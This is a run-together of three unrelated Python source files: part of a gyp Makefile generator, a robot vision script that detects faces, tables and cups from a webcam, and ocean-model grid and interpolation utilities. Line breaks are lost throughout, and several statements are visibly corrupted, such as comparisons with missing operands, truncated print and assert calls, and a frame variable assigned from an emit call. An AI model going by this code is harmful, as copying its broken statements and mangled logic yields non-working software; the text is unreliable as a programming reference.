libraries: # Remove duplicate entries libraries = gyp.common.uniquer(libraries) if self.flavor == 'mac': libraries = self.xcode_settings.AdjustLibraries(libraries) self.WriteList(libraries, 'LIBS') self.WriteLn('%s: GYP_LDFLAGS := $(LDFLAGS_$(BUILDTYPE))' % QuoteSpaces(self.output_binary)) self.WriteLn('%s: LIBS := $(LIBS)' % QuoteSpaces(self.output_binary)) if self.flavor == 'mac': self.WriteLn('%s: GYP_LIBTOOLFLAGS := $(LIBTOOLFLAGS_$(BUILDTYPE))' % QuoteSpaces(self.output_binary)) # Postbuild actions. Like actions, but implicitly depend on the target's # output. postbuilds = [] if self.flavor == 'mac': if target_postbuilds: postbuilds.append('$(TARGET_POSTBUILDS_$(BUILDTYPE))') postbuilds.extend(gyp.xcode_emulation.GetSpecPostbuildCommands(spec)) if postbuilds: # Envvars may be referenced by TARGET_POSTBUILDS_$(BUILDTYPE), # so we must output its definition first, since we declare variables # using ":=". self.WriteSortedXcodeEnv(self.output, self.GetSortedXcodePostbuildEnv()) for configname in target_postbuilds: self.WriteLn('%s: TARGET_POSTBUILDS_%s := %s' % (QuoteSpaces(self.output), configname, gyp.common.EncodePOSIXShellList(target_postbuilds[configname]))) # Postbuilds expect to be run in the gyp file's directory, so insert an # implicit postbuild to cd to there. postbuilds.insert(0, gyp.common.EncodePOSIXShellList(['cd', self.path])) for i, postbuild in enumerate(postbuilds): if not postbuild.startswith('$'): postbuilds[i] = EscapeShellArgument(postbuild) self.WriteLn('%s: builddir := $(abs_builddir)' % QuoteSpaces(self.output)) self.WriteLn('%s: POSTBUILDS := %s' % ( QuoteSpaces(self.output), ' '.join(postbuilds))) # A bundle directory depends on its dependencies such as bundle resources # and bundle binary. When all dependencies have been built, the bundle # needs to be packaged. if self.is_mac_bundle: # If the framework doesn't contain a binary, then nothing depends # on the actions -- make the framework depend on them directly too. self.WriteDependencyOnExtraOutputs(extra_outputs) # Bundle dependencies. Note that the code below adds actions to this # target, so if you move these two lines, move the lines below as well. self.WriteList(map(QuoteSpaces, bundle_deps), 'BUNDLE_DEPS') self.WriteLn('%s: $(BUNDLE_DEPS)' % QuoteSpaces(self.output)) # After the framework is built, package it. Needs to happen before # postbuilds, since postbuilds depend on this. if self.type in ('shared_library', 'loadable_module'): self.WriteLn('\t@$(call do_cmd,mac_package_framework,,,%s)' % self.xcode_settings.GetFrameworkVersion()) # Bundle postbuilds can depend on the whole bundle, so run them after # the bundle is packaged, not already after the bundle binary is done. if postbuilds: self.WriteLn('\t@$(call do_postbuilds)') postbuilds = [] # Don't write postbuilds for target's output. # Needed by test/mac/ self.WriteLn('\t@true # No-op, used by tests') # Since this target depends on binary and resources which are in # nested subfolders, the framework directory will be older than # its dependencies usually. To prevent this rule from executing # on every build (expensive, especially with postbuilds), expliclity # update the time on the framework directory. self.WriteLn('\t@touch -c %s' % QuoteSpaces(self.output)) if postbuilds: assert not self.is_mac_bundle, ('Postbuilds for bundles should be done on the bundle, not the binary (target \'%s\')' % assert 'product_dir' not in spec, 'Postbuilds do not work with custom product_dir' if self.type == 'executable': self.WriteLn('%s: LD_INPUTS := %s' % (QuoteSpaces(self.output_binary), ' '.join(map(QuoteSpaces, link_deps)))) if self.toolset == 'host' and self.flavor == 'android': self.WriteDoCmd([self.output_binary], link_deps, 'link_host', part_of_all, postbuilds=postbuilds) else: self.WriteDoCmd([self.output_binary], link_deps, 'link', part_of_all, postbuilds=postbuilds) elif self.type == 'static_library': for link_dep in link_deps: assert ' ' not in link_dep, ("Spaces in alink input filenames not supported (%s)" % link_dep) if (self.flavor not in ('mac', 'openbsd', 'netbsd', 'win') and not self.is_standalone_static_library): self.WriteDoCmd([self.output_binary], link_deps, 'alink_thin', part_of_all, postbuilds=postbuilds) else: self.WriteDoCmd([self.output_binary], link_deps, 'alink', part_of_all, postbuilds=postbuilds) elif self.type == 'shared_library': self.WriteLn('%s: LD_INPUTS := %s' % (QuoteSpaces(self.output_binary), ' '.join(map(QuoteSpaces, link_deps)))) self.WriteDoCmd([self.output_binary], link_deps, 'solink', part_of_all, postbuilds=postbuilds) elif self.type == 'loadable_module': for link_dep in link_deps: assert ' ' not in link_dep, ("Spaces in module input filenames not supported (%s)" % link_dep) if self.toolset == 'host' and self.flavor == 'android': self.WriteDoCmd([self.output_binary], link_deps, 'solink_module_host', part_of_all, postbuilds=postbuilds) else: self.WriteDoCmd([self.output_binary], link_deps, 'solink_module', part_of_all, postbuilds=postbuilds) elif self.type == 'none': # Write a stamp line. self.WriteDoCmd([self.output_binary], deps, 'touch', part_of_all, postbuilds=postbuilds) else: print("WARNING: no output for", self.type, # Add an alias for each target (if there are any outputs). # Installable target aliases are created below. if ((self.output and self.output != and (self.type not in self._INSTALLABLE_TARGETS)): self.WriteMakeRule([], [self.output], comment='Add target alias', phony=True) if part_of_all: self.WriteMakeRule(['all'], [], comment='Add target alias to "all" target.', phony=True) # Add special-case rules for our installable targets. # 1) They need to install to the build dir or "product" dir. # 2) They get shortcuts for building (e.g. "make chrome"). # 3) They are part of "make all". if (self.type in self._INSTALLABLE_TARGETS or self.is_standalone_static_library): if self.type == 'shared_library': file_desc = 'shared library' elif self.type == 'static_library': file_desc = 'static library' else: file_desc = 'executable' install_path = self._InstallableTargetInstallPath() installable_deps = [self.output] if (self.flavor == 'mac' and not 'product_dir' in spec and self.toolset == 'target'): # On mac, products are created in install_path immediately. assert install_path == self.output, '%s != %s' % (install_path, self.output) # Point the target alias to the final binary output. self.WriteMakeRule([], [install_path], comment='Add target alias', phony=True) if install_path != self.output: assert not self.is_mac_bundle # See comment a few lines above. self.WriteDoCmd([install_path], [self.output], 'copy', comment='Copy this to the %s output path.' % file_desc, part_of_all=part_of_all) installable_deps.append(install_path) if self.output != self.alias and self.alias != self.WriteMakeRule([self.alias], installable_deps, comment='Short alias for building this %s.' % file_desc, phony=True) if part_of_all: self.WriteMakeRule(['all'], [install_path], comment='Add %s to "all" target.' % file_desc, phony=True) def WriteList(self, value_list, variable=None, prefix='', quoter=QuoteIfNecessary): """ Write a variable definition that is a list of values. E.g. WriteList(['a','b'], 'foo', prefix='blah') writes out foo = blaha blahb but in a pretty-printed style. """ values = '' if value_list: value_list = [quoter(prefix + l) for l in value_list] values = ' \\\n\t' + ' \\\n\t'.join(value_list) self.fp.write('%s :=%s\n\n' % (variable, values)) # TODO(refack) `part_of_all` is not used, but is part of signature used in many other places # noinspection PyUnusedLocal def WriteDoCmd(self, outputs, inputs, command, part_of_all=False, comment=None, postbuilds=None): """ Write a Makefile rule that uses do_cmd. This makes the outputs dependent on the command line that was run, as well as support the V= make command line flag. """ suffix = '' if postbuilds: assert ',' not in command suffix = ',,1' # Tell do_cmd to honor $POSTBUILDS self.WriteMakeRule( outputs, inputs, actions=['$(call do_cmd,%s%s)' % (command, suffix)], comment=comment, command=command, force=True ) # Add our outputs to the list of targets we read depfiles from. # all_deps is only used for deps file reading, and for deps files we replace # spaces with ? because escaping doesn't work with make's $(sort) and # other functions. outputs = [QuoteSpaces(o, SPACE_REPLACEMENT) for o in outputs] self.WriteLn('all_deps += %s' % ' '.join(outputs)) def WriteMakeRule(self, outputs, inputs, actions=None, comment=None, order_only=False, force=False, phony=False, command=None): """ Write a Makefile rule, with some extra tricks. outputs: a list of outputs for the rule (note: this is not directly supported by make; see comments below) inputs: a list of inputs for the rule actions: a list of shell commands to run for the rule comment: a comment to put in the Makefile above the rule (also useful for making this Python script's code self-documenting) order_only: if true, makes the dependency order-only force: if true, include FORCE_DO_CMD as an order-only dep phony: if true, the rule does not actually generate the named output, the output is just a name to run the rule command: (optional) command name to generate unambiguous labels """ outputs = [QuoteSpaces(o) for o in outputs] inputs = map(QuoteSpaces, inputs) if comment: self.WriteLn('# ' + comment) if phony: self.WriteLn('.PHONY: ' + ' '.join(outputs)) if actions: self.WriteLn("%s: TOOLSET := $(TOOLSET)" % outputs[0]) force_append = ' FORCE_DO_CMD' if force else '' if order_only: # Order only rule: Just write a simple rule. # TODO(evanm): just make order_only a list of deps instead of this hack. self.WriteLn('%s: | %s%s' % (' '.join(outputs), ' '.join(inputs), force_append)) elif len(outputs) == 1: # Regular rule, one output: Just write a simple rule. self.WriteLn('%s: %s%s' % (outputs[0], ' '.join(inputs), force_append)) else: # Regular rule, more than one output: Multiple outputs are tricky in make. We will write three rules: # - All outputs depend on an intermediate file. # - Make .INTERMEDIATE depend on the intermediate. # - The intermediate file depends on the inputs and executes the actual command. # - The intermediate recipe will 'touch' the intermediate file. # - The multi-output rule will have a do-nothing recipe. # Hash the target name to avoid generating overlong filenames. key = (command if command else'utf-8') slug = re.sub(r'\w', key, '') cmddigest = hashlib.sha1(key).hexdigest() intermediate = "%s.%s.intermediate" % (cmddigest, slug) self.WriteLn('%s: %s' % (' '.join(outputs), intermediate)) self.WriteLn('\t%s' % '@:') self.WriteLn('%s: %s' % ('.INTERMEDIATE', intermediate)) self.WriteLn('%s: %s%s' % (intermediate, ' '.join(inputs), force_append)) actions.insert(0, '$(call do_cmd,touch)') if actions: for action in actions: self.WriteLn('\t%s' % action) self.WriteLn() def WriteAndroidNdkModuleRule(self, module_name, all_sources, link_deps): """Write a set of LOCAL_XXX definitions for Android NDK. These variable definitions will be used by Android NDK but do nothing for non-Android applications. Arguments: module_name: Android NDK module name, which must be unique among all module names. all_sources: A list of source files (will be filtered by Compilable). link_deps: A list of link dependencies, which must be sorted in the order from dependencies to dependents. """ if self.type not in ('executable', 'shared_library', 'static_library'): return self.WriteLn('# Variable definitions for Android applications') self.WriteLn('include $(CLEAR_VARS)') self.WriteLn('LOCAL_MODULE := ' + module_name) self.WriteLn('LOCAL_CFLAGS := $(CFLAGS_$(BUILDTYPE)) ' '$(DEFS_$(BUILDTYPE)) ' # LOCAL_CFLAGS is applied to both of C and C++. There is # no way to specify $(CFLAGS_C_$(BUILDTYPE)) only for C # sources. '$(CFLAGS_C_$(BUILDTYPE)) ' # $(INCS_$(BUILDTYPE)) includes the prefix '-I' while # LOCAL_C_INCLUDES does not expect it. So put it in # LOCAL_CFLAGS. '$(INCS_$(BUILDTYPE))') # LOCAL_CXXFLAGS is obsolete and LOCAL_CPPFLAGS is preferred. self.WriteLn('LOCAL_CPPFLAGS := $(CFLAGS_CC_$(BUILDTYPE))') self.WriteLn('LOCAL_C_INCLUDES :=') self.WriteLn('LOCAL_LDLIBS := $(LDFLAGS_$(BUILDTYPE)) $(LIBS)') # Detect the C++ extension. cpp_ext = {'.cc': 0, '.cpp': 0, '.cxx': 0} default_cpp_ext = '.cpp' for filename in all_sources: ext = os.path.splitext(filename)[1] if ext in cpp_ext: cpp_ext[ext] += 1 if cpp_ext[ext] > cpp_ext[default_cpp_ext]: default_cpp_ext = ext self.WriteLn('LOCAL_CPP_EXTENSION := ' + default_cpp_ext) self.WriteList(map(self.Absolutify, filter(Compilable, all_sources)), 'LOCAL_SRC_FILES') # Filter out those which do not match prefix and suffix and produce # the resulting list without prefix and suffix. def DepsToModules(deps, prefix, suffix): modules = [] for filepath in deps: mod_filename = os.path.basename(filepath) if mod_filename.startswith(prefix) and mod_filename.endswith(suffix): modules.append(mod_filename[len(prefix):-len(suffix)]) return modules # Retrieve the default value of 'SHARED_LIB_SUFFIX' params = {'flavor': 'linux'} default_variables = {} CalculateVariables(default_variables, params) self.WriteList( DepsToModules(link_deps, generator_default_variables['SHARED_LIB_PREFIX'], default_variables['SHARED_LIB_SUFFIX']), 'LOCAL_SHARED_LIBRARIES') self.WriteList( DepsToModules(link_deps, generator_default_variables['STATIC_LIB_PREFIX'], generator_default_variables['STATIC_LIB_SUFFIX']), 'LOCAL_STATIC_LIBRARIES') if self.type == 'executable': self.WriteLn('include $(BUILD_EXECUTABLE)') elif self.type == 'shared_library': self.WriteLn('include $(BUILD_SHARED_LIBRARY)') elif self.type == 'static_library': self.WriteLn('include $(BUILD_STATIC_LIBRARY)') self.WriteLn() def WriteLn(self, text=''): self.fp.write(text + '\n') def GetSortedXcodeEnv(self, additional_settings=None): return gyp.xcode_emulation.GetSortedXcodeEnv(self.xcode_settings, "$(abs_builddir)", os.path.join("$(abs_srcdir)", self.path), "$(BUILDTYPE)", additional_settings) def GetSortedXcodePostbuildEnv(self): # CHROMIUM_STRIP_SAVE_FILE is a chromium-specific hack. # TODO(thakis): It would be nice to have some general mechanism instead. strip_save_file = self.xcode_settings.GetPerTargetSetting('CHROMIUM_STRIP_SAVE_FILE', '') # Even if strip_save_file is empty, explicitly write it. Else a postbuild # might pick up an export from an earlier target. return self.GetSortedXcodeEnv(additional_settings={'CHROMIUM_STRIP_SAVE_FILE': strip_save_file}) def WriteSortedXcodeEnv(self, target, env): for k, v in env: # For # foo := a\ b # the escaped space does the right thing. For # export foo := a\ b # it does not -- the backslash is written to the env as literal character. # So don't escape spaces in |env[k]|. self.WriteLn('%s: export %s := %s' % (QuoteSpaces(target), k, v)) def Objectify(self, path): """Convert a path to its output directory form.""" if '$(' in path: path = path.replace('$(obj)/', '$(obj).%s/$(TARGET)/' % self.toolset) if not '$(obj)' in path: path = '$(obj).%s/$(TARGET)/%s' % (self.toolset, path) return path def Pchify(self, path, lang): """Convert a prefix header path to its output directory form.""" path = self.Absolutify(path) if '$(' in path: path = path.replace('$(obj)/', '$(obj).%s/$(TARGET)/pch-%s' % (self.toolset, lang)) return path return '$(obj).%s/$(TARGET)/pch-%s/%s' % (self.toolset, lang, path) def Absolutify(self, path): """Convert a subdirectory-relative path into a base-relative path. Skips over paths that contain variables.""" if '$(' in path: # Don't call normpath in this case, as it might collapse the # path too aggressively if it features '..'. However it's still # important to strip trailing slashes. return path.rstrip('/') return os.path.normpath(os.path.join(self.path, path)) @staticmethod def ExpandInputRoot(template, expansion, dirname): if '%(INPUT_ROOT)s' not in template and '%(INPUT_DIRNAME)s' not in template: return template path = template % { 'INPUT_ROOT': expansion, 'INPUT_DIRNAME': dirname, } return path def _InstallableTargetInstallPath(self): """Returns the location of the final output for an installable target.""" # Xcode puts shared_library results into PRODUCT_DIR, and some gyp files # rely on this. Emulate this behavior for mac. if (self.type == 'shared_library' and (self.flavor != 'mac' or self.toolset != 'target')): # Install all shared libs into a common directory (per toolset) for # convenient access with LD_LIBRARY_PATH. return '$(builddir)/lib.%s/%s' % (self.toolset, self.alias) return '$(builddir)/' + self.alias
import numpy as np import itertools import cv2 from time import sleep import os import math import event from color_matcher import ColorMatcher from sensors.sift_matcher import SIFTMatcher from pixels2coords import pixels2coords, get_distance_from_cup_width def distance_between_faces(face1, face2): x1, y1, w1, h1 = face1 x2, y2, w2, h2 = face2 return math.sqrt((x1 + w1/2.0 - x2 - w2/2.0)**2 + (y1 + h1/2.0 - y2 - h2/2.0)**2) def distance_to_center(face, size=(640, 480)): """ Get the distance from the center of the faces bounding box to the center of the image. >>> distance_to_center((270, 200, 20, 20)) 50.0 >>> distance_to_center((310, 230, 20, 20)) 0.0 >>> distance_to_center((310, 230, 20, 20), (1024, 768)) 240.0 """ x, y, w, h = face c_x, c_y = x+w/2.0, y+h/2.0 return math.sqrt((c_x - size[0]/2.0)**2+(c_y - size[1]/2.0)**2) def common_area(face1, face2): """ Calculate the percentage of common area for two bounding boxes. Should be 0 for completely different bounding boxes, 1 for the same. >>> common_area((100, 200, 300, 400), (100, 200, 300, 400)) 1.0 >>> common_area((1, 2, 3, 4), (6, 7, 8, 9)) 0.0 >>> common_area((100, 100, 100, 100), (150, 100, 100, 100)) 0.5 >>> round(common_area((100, 100, 100, 100), (150, 100, 100, 200)), 4) 0.3333 """ area = (face1[2]*face1[3] + face2[2]*face2[3])/2.0 left = max(face1[0], face2[0]) right = min(face1[0] + face1[2], face2[0]+face2[2]) top = max(face1[1], face2[1]) bottom = min(face1[1]+face1[3], face2[1]+face2[3]) if left < right and top < bottom: return (right - left)*(bottom-top)/area return 0.0 class Webcam(event.EventEmitter): def __init__(self, ev, cam): self.cap = cv2.VideoCapture(cam) self.cap.set(3, 1280) self.cap.set(4, 720) super(Webcam, self).__init__(ev) def run(self): while self.run_flag.is_set(): _, frame = self.emit('frame', frame) k = cv2.waitKey(5) & 0xFF if k == 27: break sleep(0.1) cv2.destroyAllWindows() self.cap.release() MAX_ITER = 15 class FaceDetector(event.DecisionMaker): def __init__(self, ev): self.i = MAX_ITER # If this script doesn't work, first check if the paths to the Haar # cascades are correct. By default they work on my computer. # On other computers they can be overwritten by setting the env # variables FACE_HAAR and PROFILE_HAAR to the appropiate values. # self.face = None self.face_cascade = cv2.CascadeClassifier(os.getenv('FACE_HAAR', 'haarcascades/haarcascade_frontalface_default.xml' )) self.profile_cascade = cv2.CascadeClassifier(os.getenv('PROFILE_HAAR', "haarcascades/haarcascade_profileface.xml" )) super(FaceDetector, self).__init__(ev) def frame(self, frame): frame = cv2.resize(frame, None, fx=0.5, fy=0.5, interpolation=cv2.INTER_AREA) gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) faces = list(self.face_cascade.detectMultiScale(gray, 1.3, 5)) for (x, y, w, h) in faces: cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2) if len(faces): distances = sorted([(face, distance_to_center(face, (1280, 1024))) for face in faces], key=lambda x: x[0][2]*x[0][3]) # Area of face if self.face is None: self.face, self.d_c = distances[-1] else: distances.sort(key=lambda x: distance_between_faces(x[0], self.face)) if distance_between_faces(self.face, distances[0][0]) < 50: self.face, self.d_c = distances[0] else: self.emit('face_gone', self.face) self.i -= 1 if self.i == 0: self.face = None self.sleep(0) cv2.imshow('faces', frame) return self.emit('face_pos', tuple(x*2 for x in self.face)) x, y, w, h = self.face cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2) cv2.imshow('faces', frame) self.i = MAX_ITER elif self.face is not None: self.emit('face_gone', self.face) self.i -= 1 if self.i == 0: self.face = None cv2.imshow('faces', frame) self.sleep(0) class TableDetector(event.DecisionMaker): def __init__(self, ev): self.ev = ev self.table_matcher = SIFTMatcher(templ='haarcascades/table.png', min_match_count=20) super(TableDetector, self).__init__(ev) def frame(self, frame): height, width = frame.shape[:2] frame = cv2.resize(frame, (3*width/4, 3*height/4)) result = self.table_matcher.find_match(frame) if result is not None: kp2, matchesMask, dst, good, dst_pts = result else: cv2.imshow('frame', frame) self.sleep(0) return frame = cv2.polylines(frame,[np.int32(dst)],True, 255) cv2.imshow('Table detector', cv2.resize(frame, dsize=None, fx=0.5, fy=0.5)) self.emit('table_pos', dst) self.sleep(0) class CupDetector(event.DecisionMaker): def __init__(self, ev, cam_angle, cup_color='pahar_mare_albastru'): self.frames_seen = 0 self.cam_angle = cam_angle self.cup_color = cup_color self.blue_cup = ColorMatcher(cup_color) self.ev = ev super(CupDetector, self).__init__(ev) def frame(self, frame): big_contours = self.blue_cup.find_bboxes(frame) contours = [] for contour in big_contours: x, y, X, Y = contour ratio = float(Y-y)/(X-x+1) contours.append((x, y, X, Y, 1, 1.2)) for x, y, X, Y in big_contours: ratio = float(Y-y)/(X-x+1) cv2.rectangle(frame, (x-2, y-2), (X, Y), (255, 0, 0), 2) cv2.putText(frame, '%0.3f' % ratio, (x, y+20), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), thickness=2) coords_list = [] for x, y, X, Y, matches, ratio in contours: cv2.rectangle(frame, (x - 2, y - 2), (X, Y), (0, 255, 0), 2) dist = '%0.2f' % get_distance_from_cup_width(X-x) coords = pixels2coords((x+X)/2., Y-(X-x), X-x, cam_angle=self.cam_angle) cv2.putText(frame, dist, (x, y-20), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), thickness=2) cv2.putText(frame, '%0.2f %0.2f %0.2f' % coords, (x, y-50), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), thickness=2) if x > 0 and X < frame.shape[1]: coords_list.append(coords) coords_list.sort() for x, y, z in coords_list: self.frames_seen = min(self.frames_seen + 1, 20) if self.frames_seen == 20 and x < 400: print 'cd: Cup appeared: %s' % self.cup_color self.emit('cup_appeared', (x, y, z)) self.frames_seen = 0 break #else: #print 'cd: Cups done: %s' % self.cup_color #self.emit('cups_done') cv2.imshow('Cup detector', cv2.resize(frame, dsize=None, fx=0.5, fy=0.5))
import numpy as np import scipy.interpolate import scipy.spatial def interpolate(coords, var, interp_coords, missing_value=None, fill=True, kind='linear'): """Interpolate globally defined data to a different (regular) grid. Arguments: coords: Tuple of coordinate arrays for each dimension. var (:obj:`ndarray` of dim (nx1, ..., nxd)): Variable data to interpolate. interp_coords: Tuple of coordinate arrays to interpolate to. missing_value (optional): Value denoting cells of missing data in ``var``. Is replaced by `NaN` before interpolating. Defaults to `None`, which means no replacement is taking place. fill (bool, optional): Whether `NaN` values should be replaced by the nearest finite value after interpolating. Defaults to ``True``. kind (str, optional): Order of interpolation. Supported are `nearest` and `linear` (default). Returns: :obj:`ndarray` containing the interpolated values on the grid spanned by ``interp_coords``. """ if len(coords) != len(interp_coords) or len(coords) != var.ndim: raise ValueError('Dimensions of coordinates and values do not match') var = np.array(var) if missing_value is not None: invalid_mask = np.isclose(var, missing_value) var[invalid_mask] = np.nan if var.ndim > 1 and coords[0].ndim == 1: interp_grid = np.rollaxis(np.array(np.meshgrid( *interp_coords, indexing='ij', copy=False)), 0, len(interp_coords) + 1) else: interp_grid = coords var = scipy.interpolate.interpn(coords, var, interp_grid, bounds_error=False, fill_value=np.nan, method=kind) if fill: var = fill_holes(var) return var def fill_holes(data): """A simple inpainting function that replaces NaN values in `data` with the nearest finite value. """ data = data.copy() shape = data.shape dim = data.ndim flag = np.zeros(shape, dtype=bool) flag[~np.isnan(data)] = True slcs = [slice(None)] * dim while np.any(~flag): for i in range(dim): slcs1 = slcs[:] slcs2 = slcs[:] slcs1[i] = slice(0, -1) slcs2[i] = slice(1, None) slcs1 = tuple(slcs1) slcs2 = tuple(slcs2) # replace from the right repmask = np.logical_and(~flag[slcs1], flag[slcs2]) data[slcs1][repmask] = data[slcs2][repmask] flag[slcs1][repmask] = True # replace from the left repmask = np.logical_and(~flag[slcs2], flag[slcs1]) data[slcs2][repmask] = data[slcs1][repmask] flag[slcs2][repmask] = True return data def get_periodic_interval(current_time, cycle_length, rec_spacing, n_rec): """Used for linear interpolation between periodic time intervals. One common application is the interpolation of external forcings that are defined at discrete times (e.g. one value per month of a standard year) to the current time step. Arguments: current_time (float): Time to interpolate to. cycle_length (float): Total length of one periodic cycle. rec_spacing (float): Time spacing between each data record. n_rec (int): Total number of records available. Returns: :obj:`tuple` containing (n1, f1), (n2, f2): Indices and weights for the interpolated record array. Example: The following interpolates a record array ``data`` containing 12 monthly values to the current time step: >>> year_in_seconds = 60. * 60. * 24. * 365. >>> current_time = 60. * 60. * 24. * 45. # mid-february >>> print(data.shape) (360, 180, 12) >>> (n1, f1), (n2, f2) = get_periodic_interval(current_time, year_in_seconds, year_in_seconds / 12, 12) >>> data_at_current_time = f1 * data[..., n1] + f2 * data[..., n2] """ locTime = current_time - rec_spacing * 0.5 + \ cycle_length * (2 - round(current_time / cycle_length)) tmpTime = locTime % cycle_length tRec1 = 1 + int(tmpTime / rec_spacing) tRec2 = 1 + tRec1 % int(n_rec) wght2 = (tmpTime - rec_spacing * (tRec1 - 1)) / rec_spacing wght1 = 1.0 - wght2 return (tRec1 - 1, wght1), (tRec2 - 1, wght2) def make_cyclic(longitude, array=None, wrap=360.): """Create a cyclic version of a longitude array and (optionally) another array. Arguments: longitude (ndarray): Longitude array of shape (nlon, ...). array (ndarray): Another array that is to be made cyclic of shape (nlon, ...). wrap (float): Wrapping value, defaults to 360 (degrees). Returns: Tuple containing (cyclic_longitudes, cyclic_array) if `array` is given, otherwise just the ndarray cyclic_longitudes of shape (2 * nlon, ...). """ lonsize = longitude.shape[0] cyclic_longitudes = np.hstack((longitude[lonsize//2:, ...] - wrap, longitude, longitude[:lonsize//2, ...] + wrap)) if array is None: return cyclic_longitudes cyclic_array = np.hstack((array[lonsize//2:, ...], array, array[:lonsize//2, ...])) return cyclic_longitudes, cyclic_array def get_coastline_distance(coords, coast_mask, spherical=False, radius=None, num_candidates=None, n_jobs=-1): """Calculate the (approximate) distance of each water cell from the nearest coastline. Arguments: coords (tuple of ndarrays): Tuple containing x and y (longitude and latitude) coordinate arrays of shape (nx, ny). coast_mask (ndarray): Boolean mask indicating whether a cell is a land cell (must be same shape as coordinate arrays). spherical (bool): Use spherical instead of Cartesian coordinates. When this is `True`, cyclical boundary conditions are used, and the resulting distances are only approximate. Cells are pre-sorted by Euclidean lon-lat distance, and great circle distances are calculated for the first `num_candidates` elements. Defaults to `False`. radius (float): Radius of spherical coordinate system. Must be given when `spherical` is `True`. num_candidates (int): Number of candidates to calculate great circle distances for for each water cell. The higher this value, the more accurate the returned distances become when `spherical` is `True`. Defaults to the square root of the number of coastal cells. n_jobs (int): Number of parallel jobs to determine nearest neighbors (defaults to -1, which uses all available threads). Returns: :obj:`ndarray` of shape (nx, ny) indicating the distance to the nearest land cell (0 if cell is land). Example: The following returns coastal distances of all T cells for a spherical Veros setup. >>> coords = np.meshgrid(self.xt[2:-2],[2:-2], indexing='ij') >>> dist = tools.get_coastline_distance(coords, self.kbot > 0, spherical=True, radius=self.radius) """ if not len(coords) == 2: raise ValueError('coords must be lon-lat tuple') if not all(c.shape == coast_mask.shape for c in coords): raise ValueError('coordinates must have same shape as coastal mask') if spherical and not radius: raise ValueError('radius must be given for spherical coordinates') watercoords = np.array([c[~coast_mask] for c in coords]).T if spherical: coastcoords = np.array(make_cyclic(coords[0][coast_mask], coords[1][coast_mask])).T else: coastcoords = np.array((coords[0][coast_mask], coords[1][coast_mask])).T coast_kdtree = scipy.spatial.cKDTree(coastcoords) distance = np.zeros(coords[0].shape) if spherical: def spherical_distance(coords1, coords2): """Calculate great circle distance from latitude and longitude""" coords1 *= np.pi / 180. coords2 *= np.pi / 180. lon1, lon2, lat1, lat2 = coords1[..., 0], coords2[..., 0], coords1[..., 1], coords2[..., 1] return radius * np.arccos(np.sin(lat1) * np.sin(lat2) + np.cos(lat1) * np.cos(lat2) * np.cos(lon1 - lon2)) if not num_candidates: num_candidates = int(np.sqrt(np.count_nonzero(~coast_mask))) i_nearest = coast_kdtree.query(watercoords, k=num_candidates, n_jobs=n_jobs)[1] approx_nearest = coastcoords[i_nearest] distance[~coast_mask] = np.min(spherical_distance(approx_nearest, watercoords[..., np.newaxis, :]), axis=-1) else: distance[~coast_mask] = coast_kdtree.query(watercoords, n_jobs=n_jobs)[0] return distance def get_uniform_grid_steps(total_length, stepsize): """Get uniform grid step sizes in an interval. Arguments: total_length (float): total length of the resulting grid stepsize (float): grid step size Returns: :obj:`ndarray` of grid steps Example: >>> uniform_steps = uniform_grid_setup(6., 0.25) >>> uniform_steps [ 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25 ] """ if total_length % stepsize: raise ValueError('total length must be an integer multiple of stepsize') return stepsize * np.ones(int(total_length / stepsize)) def get_stretched_grid_steps(n_cells, total_length, minimum_stepsize, stretching_factor=2.5, two_sided_grid=False, refine_towards='upper'): """Computes stretched grid steps for regional and global domains with either one or two-sided stretching using a hyperbolic tangent stretching function. Arguments: n_cells (int): Number of grid points. total_length (float): Length of the grid interval to be covered (sum of the resulting grid steps). minimum_stepsize (float): Grid step size on the lower end of the interval. stretching_factor (float, optional): Coefficient of the `tanh` stretching function. The higher this value, the more abrupt the step sizes change. two_sided_grid (bool, optional): If set to `True`, the resulting grid will be symmetrical around the center. Defaults to `False`. refine_towards ('upper' or 'lower', optional): The side of the interval that is to be refined. Defaults to 'upper'. Returns: :obj:`ndarray` of shape `(n_cells)` containing grid steps. Examples: >>> dyt = get_stretched_grid_steps(14, 180, 5) >>> dyt [ 5.10517337 5.22522948 5.47813251 5.99673813 7.00386752 8.76808565 11.36450896 14.34977676 16.94620006 18.71041819 19.71754758 20.2361532 20.48905624 20.60911234] >>> dyt.sum() 180.0 >>> dyt = get_stretched_grid_steps(14, 180, 5, stretching_factor=4.) >>> dyt [ 5.00526979 5.01802837 5.06155549 5.20877528 5.69251688 7.14225176 10.51307232 15.20121339 18.57203395 20.02176884 20.50551044 20.65273022 20.69625734 20.70901593] >>> dyt.sum() 180.0 """ if refine_towards not in ('upper', 'lower'): raise ValueError('refine_towards must be "upper" or "lower"') if two_sided_grid: if n_cells % 2: raise ValueError('number of grid points must be even integer number (given: {})'.format(n_cells)) n_cells = n_cells / 2 stretching_function = np.tanh(stretching_factor * np.linspace(-1, 1, n_cells)) if refine_towards == 'lower': stretching_function = stretching_function[::-1] if two_sided_grid: stretching_function = np.concatenate((stretching_function[::-1], stretching_function)) def normalize_sum(var, sum_value, minimum_value=0.): if abs(var.sum()) < 1e-5: var += 1 var *= (sum_value - len(var) * minimum_value) / var.sum() return var + minimum_value stretching_function = normalize_sum(stretching_function, total_length, minimum_stepsize) assert abs(1 - np.sum(stretching_function) / total_length) < 1e-5, 'precision error' return stretching_function def get_vinokur_grid_steps(n_cells, total_length, lower_stepsize, upper_stepsize=None, two_sided_grid=False, refine_towards='upper'): """Computes stretched grid steps for regional and global domains with either one or two-sided stretching using Vinokur stretching. This stretching function minimizes discretization errors on finite difference grids. Arguments: n_cells (int): Number of grid points. total_length (float): Length of the grid interval to be covered (sum of the resulting grid steps). lower_stepsize (float): Grid step size on the lower end of the interval. upper_stepsize (float or ``None``, optional): Grid step size on the upper end of the interval. If not given, the one-sided version of the algorithm is used (that enforces zero curvature on the upper end). two_sided_grid (bool, optional): If set to `True`, the resulting grid will be symmetrical around the center. Defaults to `False`. refine_towards ('upper' or 'lower', optional): The side of the interval that is to be refined. Defaults to 'upper'. 